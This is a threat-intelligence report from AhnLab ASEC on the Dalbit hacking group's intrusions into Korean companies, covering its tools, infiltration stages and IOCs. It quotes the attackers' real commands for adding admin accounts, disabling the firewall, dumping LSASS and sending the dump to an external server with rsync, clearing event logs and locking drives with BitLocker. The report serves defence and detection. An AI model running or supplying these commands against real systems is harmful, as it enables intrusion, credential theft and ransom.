0. Overview
This report is a continuation of the “Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies” post that was uploaded on August 16, 2022 and follows the group’s activities since that post.
This group has always relied on open-source tools and lacked any distinct characteristics to profile them due to the lack of PDB information. Additionally, the amount of information that could be collected was limited unless the affected Korean companies specifically asked for an investigation since the threat actor’s C2 (Command&Control) server abused the servers of the Korean companies. However, after the post was uploaded and a portion of the Korean company servers used by the threat actor were blocked, the threat actor began to use a hosting server called “*.m00nlight.top” as their C2 and download server. Thus, the ASEC team decided to call this group Dalbit (m00nlight.top) after the Korean word for ‘Moonlight’.
This group has had more than 50 confirmed attack attempts on Korean companies since 2022. Most of the attacked companies were mid to small companies while a portion was major companies. The team has confirmed that 30% of the infected companies were using a certain Korean groupware solution. It is currently difficult to check whether this groupware product has a vulnerability or not, but if a server that is this exposed has a vulnerability, then there is a chance that companies could be affected gravely through the leakage of confidential information and ransomware behavior. Furthermore, this Dalbit group leaves some infected companies as proxies and download servers to later use them as means to communicate with the threat actor upon infiltration of another company.
Therefore, we strongly recommend performing an internal security check if users suspect that they have been attacked by this Dalbit group. The team asks that users send a report to AhnLab and take preemptive measures to prevent secondary harm and potential damage to other companies.
1. Affected Korean Companies (Industry Type)
Listed below are the 50 companies that were confirmed to have been affected since 2022. Companies that have not been clearly confirmed were excluded from this list. It is possible that more companies could have been affected.
The following are the descriptions of each industry type.
- Technology: Companies that handle software or hardware
- Industrial: Manufacturing companies that handle machinery, paint jobs, steel, metals, etc.
- Chemical: Cosmetic, pharmaceutical, and plastic companies
- Construction: Associations or organizations related to construction or construction companies
- Automobile: Automobile-related manufacturing companies
- Semiconductor: Semiconductor-related manufacturing companies
- Education: Educational companies
- Wholesale: Wholesalers
- Media: Printing and media companies
- Food: Food companies
- Shipping: Shipping companies
- Hospitality: Leisure or tourist accommodation companies
- Energy: Energy companies
- Shipbuilding: Shipbuilding companies
- Consulting: Management consulting companies
2. Flow and Characteristics
2.1. Summary Diagram
The above diagram shows the threat actor’s infiltration process into Company B. A brief summary of this flow is in the table below.
| 1) Initial Access The threat actor targets web servers or SQL servers, which they gain access to by exploiting vulnerabilities. They then attempt to control the systems with tools such as WebShell. 2) Command & Control 3) Proxy & Internal Reconnaissance 4) Lateral Movement 5) Impact |
The following are major characteristics of the Dalbit group.
2.2. Characteristics of Dalbit
| List | Description |
|---|---|
| Threat Actor’s C2 Servers | Download and C2 (Command&Control) servers: Korean company or hosting servers Over half of these servers are exploited Korean company servers *.m00nlight.top or IP format addresses are often used for the hosting servers |
| Attempts Control Through RDP | Usually attempts to access RDP after infection Either a proxy tool or Gotohttp is used for RDP connection |
| Proxy Tools | Major proxy tools used include FRP, LCX (Htran), NPS, ReGeorg , etc. |
| Add User Account | A net command is used to add an account Account credentials (ID: “main” / PW: “ff0.123456”) |
| Open-source Tool | Mostly uses open-source tools that are publicly available A lot of tools are written in Chinese |
| Evasion | VMProtect is used to prevent hacking tools from being detected Security event logs are deleted |
| Extorted Information | User account credentials Email information Screen leak Installed program information |
3. Tools Used and Infiltration Process
3.1. Tools and Malware Used
| WebShell | Downloader | Privilege Escalation | Proxy | Internal Reconnaissance |
|---|---|---|---|---|
| Godzilla ASPXSpy AntSword China Chopper |
Certutil (Windows CMD) Bitsadmin (Windows CMD) |
BadPotato JuicyPotato SweetPotato RottenPotato EFSPotato CVE-2018-8639 |
FRP LCX NPS ReGeorg |
FScan NbtScan TCPScan Goon Nltest (Windows CMD) |
| Lateral Movement | Information Leak and Collection | Backdoor | File Encryption | Evasion |
|---|---|---|---|---|
| RDP PsExec RemCom Winexec |
Wevtutil (Windows CMD) WMI (Windows CMD) ProcDump Dumpert EML Extractor (created) Mimikatz Rsync |
CobaltStrike MetaSploit BlueShell Ladon |
BitLocker (Windows CMD) |
Security log deletion (Windows CMD) Firewall OFF (Windows CMD) Attempts to delete AV products VMProtect Packing |
Only one tool for leaking emails seems to have been made by the group themselves. The rest are normal Windows programs or tools that can easily be found online.
3.2. Infiltration Process
3.2.1. Initial Infiltration
It is assumed that their attack targets are usually servers with a specific Korean groupware installed on them, email servers (Exchange Server), and SQL servers. The threat actor exploited either file upload vulnerabilities or WebLogic vulnerabilities such as CVE-2017-10271 to upload their WebShell. A portion appeared to have used a SQL server command prompt (xp_cmdshell).
The most frequently used WebShells are Godzilla, ASPXSpy, AntSword, and China Chopper in that order. Aside from these, several other WebShells were also found.
The installation paths of the WebShells are as follows.
| – Job recruitment (File upload vulnerability) D:WEB********recruitcss1.ashx D:WEB********recruitcss4.ashx D:WEB********recruitcommonconf.aspx ... – File upload vulnerability – Certain groupware – Email server (Exchange Server) – Weblogic D:***wls1035domains************servers*******tmp************uddiexplorergcx62xwarmodifyregistryhelp.jsp –Tomcat |
3.2.2. Download
The threat actor downloads other hacking tools through default Windows programs. Since WebShells are normally used in infiltration, parent processes, excluding command processes like cmd, are run by web server processes such as w3wp.exe, java.exe, sqlserver.exe, and tomcat*.exe. The downloaded files include privilege escalation tools, proxy tools, and network scanning tools, all of which are required by the threat actor. The download command is as follows.
(Additionally, the full addresses of the Korean companies that have been exploited will not be disclosed.)
1) Certutil
2) Bitsadmin
The hacking tools and malware downloaded by the threat actor were usually found in the following paths.
| %ALLUSERSPROFILE%
%SystemDrive%temp %SystemRoot% |
Therefore, the files in these paths should be checked if users suspect that they have been infiltrated.
3.2.3. Privilege Escalation and Account Addition
The threat actor mainly used Potato (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) and PoC (CVE-2018-8639, CVE-2019-1458), which has been published on GitHub, for privilege escalation. After privilege escalation, they characteristically add the following account.
The below sp.exe is the SweetPotato tool.
| > sp.exe “whaomi” (Privilege check) > sp.exe “netsh advfirewall set allprofiles state off” (Firewall OFF) > sp.exe “net user main ff0.123456 /add & net localgroup administrators main /add” (Add account) |
The point of focus here is the name of the account added by the threat actor. Threat actor accounts with the name “main” have been found in other infiltrated company servers.
Aside from adding accounts, the threat actor would also use stolen admin accounts.
| > wmic /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$ process call create “cmd.exe /c c:temps.bat” |
3.2.4. Proxy Settings
After infiltrating a server, the threat actor initiates access via proxy to use RDP communications. FRP and LCX were the mainly used proxy tools, and there have been cases where ReGeorg, NPS, or RSOCKS was found in some companies. Additionally, multiple proxy tools including FRP and LCX were found in one area of a certain company that was infiltrated. Multiple FRP configuration files (.ini) would also be discovered in cases where internal propagation had occurred. We believe that the threat actor installs additional FRPs and uses multiple configuration files when an accessible PC has a lot to gain. Furthermore, the LCX used by this group has the same features as the open-source LCX, but its version is not the same as the one uploaded to GitHub, meaning that a binary that was arbitrarily compiled by a Chinese person was used.
Proxy tools like FRP and LCX differ in terms of forwarding methods and supported protocols. However, since their differences, actual infection cases, recreation, and network packets have all been covered in the TI report, “Analysis Report on Attack Cases Exploiting Various Remote Control Tools,” they will not be reiterated in this post.
1) FRP(FAST REVERSE PROXY)
FRP configuration files (.ini) were found in all servers and PC devices infiltrated by this group. The following is an actual case of an infiltrated company.
In particular, the Dalbit group usually used the Socks5 protocol to communicate. The Socks5 protocol is a layer 5 protocol in the 7 OSI layers. It can handle various requests such as HTTP, FTP, and RDP since it is between layer 4 and 7. Therefore, if the threat actor uses a proxy connection tool that can handle Socks5, such as Proxifier, remote control through RDP becomes possible. If a connection can be established to an internal PC, lateral movement can also be achieved. Thus, if the configuration file is set as a Socks5 protocol, the threat actor will have more freedom as additional modifications will no longer be required to handle various requests.
The following are FRP filenames and commands used by the threat actor. The list is in a descending order from most to least used.
- FRP filenames
| update.exe debug.exe main.exe info.exe Agent.exe frpc.exe test.exe zabbix.exe winh32.exe cmd.exe |
- FRP commands
| > update.exe -c frpc.ini > update.exe -c 8080.ini > update.exe -c 8.ini > info.zip -c frpc__8083.ini > debug.exe -c debug.ini > debug.exe -c debug.log > debug.exe -c debug.txt > frpc.exe -c frpc__2381.ini > cmd.exe /c c:temp****tempfrpc.ini … |
In certain companies, the FRP was registered to the task scheduler (schtasks) under the name “debug” to maintain its persistence. As shown in Table 12, the team confirmed the execution of a registered scheduler.
| > schtasks /tn debug /run |
2) LCX(HTRAN)
Dalbit used an LCX (Htran) binary compiled by a certain Chinese person. This has the same features as the existing binary, but it also includes the nickname of the binary creator.
We can confirm through this that the nickname of the person who had created the binary is “折羽鸿鹄” (QQ:56345566). It is highly unlikely that this developer is the threat actor in question; however, since this binary cannot be downloaded through a simple search online, it is assumed that the threat actor has a connection to China.
The installed filenames and executables are as follows:
- LCX filenames
| lcx3.exe lcx.exe update.exe |
- LCX commands
| > update.exe -slave 1.246.***.*** 110 127.0.0.1 3389 > lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389 … |
The above LCX C2 is a Korean company server and has been concealed.
3.2.5. Internal Reconnaissance
Fscan and NBTScan have been commonly used for network scans, but the usage of TCP Scan and Goon have also been confirmed for some cases.
Goon is a network scanning tool made with Golang that not only allows basic port scanning, but scanning for Tomcat, MSSQL, and MYSQL accounts as well. We can see that this tool was also made in Chinese.
3.2.6. Information Extortion
LSASS Dump information and EML files of certain accounts are usually the information that is stolen. It has been confirmed that installed programs are checked through a WMIC command or a screenshot of the affected PC is sent to the threat actor’s server at regular intervals according to the companies.
1) Credential Extraction (LSASS Dump)
According to the target, the threat actor would choose to not install Mimikatz and attempt to extract credentials instead. This is a method that dumps the Lsass.exe process. Credential information can be obtained from a PC with tools like Mimikatz or Pypykatz since they can be found within the dump file. Additionally, a detailed explanation of Mimikatz can be found in the TI report, “Analysis Report on Internal Web Spreading Methods Using Mimikatz“.
The following method is how the threat actor stole credentials without Mimikatz.
1-1) Dumpert
Open-source Dumpert is an API hooking evasion tool that operates according to the target OS system and uses the MiniDumpWriteDump() API to dump the lsass.exe process. The threat actor modified the code to change the path of the dump file and remove features like log output.
The above figure shows that the two versions are the same aside from the different paths and the removal of the output string.
The following table displays all of the “%SystemRoot%temp” dump file paths that have currently been found.
| %SystemRoot%tempduhgghmpert.dmp %SystemRoot%tempdumpert.dmp %SystemRoot%temptarko.dmp %SystemRoot%templsa.txt … |
1-2 ) Procdump
Procdump is a normal utility program provided by Microsoft and offers the process dump feature. The threat actor performed a dump like the one in Figure 8 with this tool.
Afterward, the threat actor used a tool called Rsync (Remote Sync) to send the dump file to their own server. The following is an actual example of information theft attempted by the threat actor.
| > svchost.exe -accepteula -ma lsass.exe web_log.dmp > rsync -avz –port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip |
2) Email Extraction
This sample is an email extraction tool developed with Golang and presumably the only known tool developed by the threat actor themselves. This tool offers the ability to target a company’s Exchange email server and extract a specific account’s email with EWS (Exchange Web Service) as an EML file. Arguments include the Exchange server address, account name, NTLM password hash of said account, date and time, etc. When launched, the tool extracts every email from the mailboxes of the target account according to the time received as an argument and saves them as an EML file.
For reference, the PDB information of this binary is “fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff”and is meaningless.
3) Screen Leak
The threat actor sent screenshots from certain PCs to their own server. While a binary that takes screenshots of the current screen has not been found as of yet, the threat actor’s server where the infected PC’s screenshots were being sent has been discovered. Screenshots from a certain company’s infiltrated PC sent pictures every 5-10 seconds.
| Outgoing server of threat actor’s screenshots: hxxp://91.217.139[.]117:8080/1.bat |
Only images were sent. The PC could not be controlled remotely and no audio was outputted either.
Also, the threat actor’s server (91.217.139[.]117) where the screenshots were being sent was also being used as a download server for another company.
4) Lookup Installed Programs and Login Information
The threat actor used a WMIC command to check installed programs.
| > wmic product get name,version |
Furthermore, the domain account credentials that caused certain event IDs to occur in the event log were collected. The created file is saved in c:tempEvtLogon.dat.
| Event ID | Meaning |
| 4624 | Login successful |
| 4768 | Kerberos authentication request |
| 4776 | NTLM authentication attempt |
| > wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:tempEvtLogon.dat |
3.2.7. File Encryption
Details about this matter have been covered in a past blog post. The threat actor used BitLocker, a Windows utility, to encrypt certain drives and demand ransoms. Currently, more affected companies are still being found.
- BitLocker commands
| > “C:WindowsSystem32BitLockerWizardElev.exe” F: T > manage-bde -lock -ForceDismount F: > manage-bde -lock -ForceDismount e: > “c:windowssystem32bitlockerwizardelev.exe” e: t > “c:windowssystem32bitlockerwizardelev.exe” f: u |
Figure 13 is the ransom note used by the threat actor. The threat actor used anonymous mailing services such as startmail.com and onionmail.com.
The command assumed to be for downloading the ransom note is as follows.
3.2.8. Evasion
1) VMPROTECT PACKING
When the binary was detected after being uploaded, the threat actor packed it with VMProtect to try and avoid detection.
| – Privilege escalation tools %ALLUSERSPROFILE%badpotatonet4.exe %ALLUSERSPROFILE%BadPotatoNet4.vmp.exe %ALLUSERSPROFILE%SweetPotato.exe %ALLUSERSPROFILE%SweetPotato.vmp.exe %ALLUSERSPROFILE%jc.vmp.exe %SystemDrive%niajuicypotato.vmp1.exe %SystemDrive%niajuicypotato.vmp.exe … – Proxy tools |
2) Windows Event Log Deletion Using Wevtutil
| Removal of security event logs > cmd.exe /c wevtutil cl security Removal of application logs > cmd.exe wevtutil.exe el > cmd.exe wevtutil.exe cl “application” |
3) Firewall OFF
| sp.exe “netsh advfirewall set allprofiles state off” |
4. Conclusion
The Dalbit hacking group attempted attacks against vulnerable Korean company servers, and logs are being reported not only from mid-sized and smaller businesses, but also from some large companies. In particular, 30% of the affected companies were found to have been using a certain Korean groupware product. Moreover, this group uses publicly available tools, from the WebShell used in the early stages to the ransomware used at the end. Among these tools, there is a proxy tool that is assumed to have been obtained from a Chinese community, a tool with Chinese documentation, and a Chinese tool not mentioned in this post. It can be assumed that the threat actor has at least a partial connection with China, considering their frequent usage of Chinese tools.
If a server admin suspects that their system has been infected, they are advised to check their IOC along with the aforementioned download paths and account name (“main”) often used by the threat actor. If suspicions are confirmed, then it is advised to immediately report your situation to AhnLab in order to minimize additional harm. Furthermore, admins should prevent vulnerability attacks by updating their servers to the newest version for vulnerability patches, and maintenance is especially needed for servers that are open externally but not managed.
5. IOC
For reference, the IP addresses of Korean company servers abused by the threat actor will not be disclosed on the ASEC blog.
- Mitre Attack
| Execution | Persistence | Privilege Escalation | Credential Access | Discovery | Defense Evasion | Lateral Movement | Collection | Exfiltration | Command and Control | Impact | Resource Development |
| – Command and Scripting Interpreter(T1059)
– Windows Management Instrumentation(T1047) – System Service(T1569) |
– Scheduled Task/Job(T1053)
– Create Account(T1136) – Server Software Component(T1505) – Account Manipulation(T1098) |
– Access Token Manipulation(T1134)
– Exploitation for Privilege Escalation(T1068) |
– OS Credential Dumping (T1003) | – Remote System Discovery(T1018)
– Network Service Discovery(T1046) |
– Impair Defenses(T1562)
– Indicator Removal(T1070) |
– Remote Services(T1021)
– Lateral Tool Transfer(T1570) |
– Data from Local System(T1005)
– Account Discovery: Email Account(1087.003) – Email Collection(T1114) – Screen Capture(T1113) |
– Exfiltration Over Web Service(T1567) | – Proxy(T1090)
– Ingress Tool Transfer(T1105) |
– Data Encrypted for Impact(T1486) | – Stage Capabilities: Upload Malware(T1608.001) |
- Detection Names
| WebShell/Script.Generic (2020.12.11.09) WebShell/ASP.ASpy.S1361 (2021.02.02.03) WebShell/ASP.Generic.S1855 (2022.06.22.03) WebShell/ASP.Small.S1378 (2021.02.24.02) WebShell/JSP.Godzilla.S1719(2021.12.03.00) WebShell/JSP.Chopper.SC183868(2022.10.15.01) WebShell/JSP.Generic.S1363 (2021.01.27.03) Backdoor/Script.Backdoor (2015.01.04.00) WebShell/JSP.Generic.S1956 (2022.11.14.00) Trojan/Script.Frpc (2022.12.17.00) JS/Webshell (2011.08.08.03) HackTool/Win.Fscan.C5334550(2023.01.27.00) HackTool/Win.Fscan.C5230904(2022.10.08.00) HackTool/Win.Fscan.R5229026(2022.10.07.03) Trojan/JS.Agent(2022.03.16.02) Unwanted/Win32.TCPScan.R33304(2012.08.17.00) HackTool/Win.Scanner.C5220929(2022.08.09.02) HackTool/Win.SweetPotato.R506105 (2022.08.04.01) Exploit/Win.BadPotato.R508814 (2022.08.04.01) HackTool/Win.JuicyPotato.R509932 (2022.08.09.03) HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00) Exploit/Win.JuicyPotato.C425839(2022.08.04.01) Exploit/Win.SweetPotato.C4093454 (2022.08.04.01) Trojan/Win.Escalation.R524707(2022.10.04.02) Trojan/Win.Generic.R457163(2021.12.09.01) HackTool/Win64.Cve-2019-1458.R345589(2020.07.22.06) Malware/Win64.Generic.C3164061 (2019.04.20.01) Malware/Win64.Generic.C3628819 (2019.12.11.01) Exploit/Win.Agent.C4448815 (2021.05.03.03) Trojan/Win.Generic.C4963786 (2022.02.11.04) Trojan/Win.Exploit.C4997833 (2022.03.08.01) Exploit/Win.Agent.C5224192 (2022.08.17.00) Exploit/Win.Agent.C5224193 (2022.08.17.00) Trojan/Win32.RL_Mimikatz.R290617(2019.09.09.01) Trojan/Win32.Mimikatz.R262842(2019.04.06.00) Trojan/Win.Swrort.R450012(2021.11.14.01) HackTool/Win.Lsassdump.R524859(2022.10.05.00) HackTool/Win.ProxyVenom.C5280699(2022.10.15.01) Unwanted/Win.Frpc.C5222534 (2022.08.13.01) Unwanted/Win.Frpc.C5218508 (2022.08.03.03) Unwanted/Win.Frpc.C5218510 (2022.08.03.03) Unwanted/Win.Frpc.C5218513 (2022.08.03.03) HackTool/Win.Frpc.5222544 (2022.08.13.01) HackTool/Win.Frp.C4959080 (2022.02.08.02) HackTool/Win.Frp.C5224195 (2022.08.17.00) Unwanted/Win.Frpc.C5162558 (2022.07.26.03) Malware/Win.Generic.C5173495 (2022.06.18.00) HackTool/Win.LCX.C5192157 (2022.07.04.02) HackTool/Win.LCX.R432995(2023.01.06.01) HackTool/Win.Rsocx.C5280341(2022.10.15.00) Backdoor/Win.BlueShell.C5272202(2022.10.05.00) Trojan/Win.BlueShell.C5280704(2022.10.15.01) Backdoor/Win.CobaltStrike.R360995(2022.09.20.00) Unwanted/Win.Extractor.C5266516(2022.10.01.00) Trojan/Win.RemCom.R237878(2023.01.07.00) |
[IOC]
- MD5 (Excluding normal files)
| – WebShell 0359a857a22c8e93bc43caea07d07e23 85a6e4448f4e5be1aa135861a2c35d35 4fc81fd5ac488b677a4c0ce5c272ffe3 c0452b18695644134a1e38af0e974172 6b4c7ea91d5696369dd0a848586f0b28 96b23ff19a945fad77dd4dd6d166faaa 88bef25e4958d0a198a2cc0d921e4384 c908340bf152b96dc0f270eb6d39437f 2c3de1cefe5cd2a5315a9c9970277bd7 e5b626c4b172065005d04205b026e446 27ec6fb6739c4886b3c9e21b6b9041b6 612585fa3ada349a02bc97d4c60de784 21c7b2e6e0fb603c5fdd33781ac84b8f c44457653b2c69933e04734fe31ff699 e31b7d841b1865e11eab056e70416f1a 69c7d9025fa3841c4cd69db1353179cf fca13226da57b33f95bf3faad1004ee0 af002abd289296572d8afadfca809294 e981219f6ba673e977c5c1771f86b189 f978d05f1ebeb5df334f395d58a7e108 e3af60f483774014c43a7617c44d05e7 c802dd3d8732d9834c5a558e9d39ed37 07191f554ed5d9025bc85ee1bf51f975 61a687b0bea0ef97224c7bd2df118b87 …(omitted) – Privilege Escalation 4bafbdca775375283a90f47952e182d9 937435bbcbc3670430bb762c56c7b329 75fe1b6536e94aaee132c8d022e14f85 d6cb8b66f7a9f3b26b4a98acb2f9d0c5 323a36c23e61c6b37f28abfd5b7e5dfe – Network Scan 5e0845a9f08c1cfc7966824758b6953a f01a9a2d1e31332ed36c1a4d2839f412 d4d8c9be9a4a6499d254e845c6835f5f – FRP |
- C2 and URL (Abused Korean company servers are not listed)
| – Download C2 91.217.139[.]117 – Upload C2 – FRP & LCX C2 – Backdoor C2 |
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information
Source: https://asec.ahnlab.com/en/47455/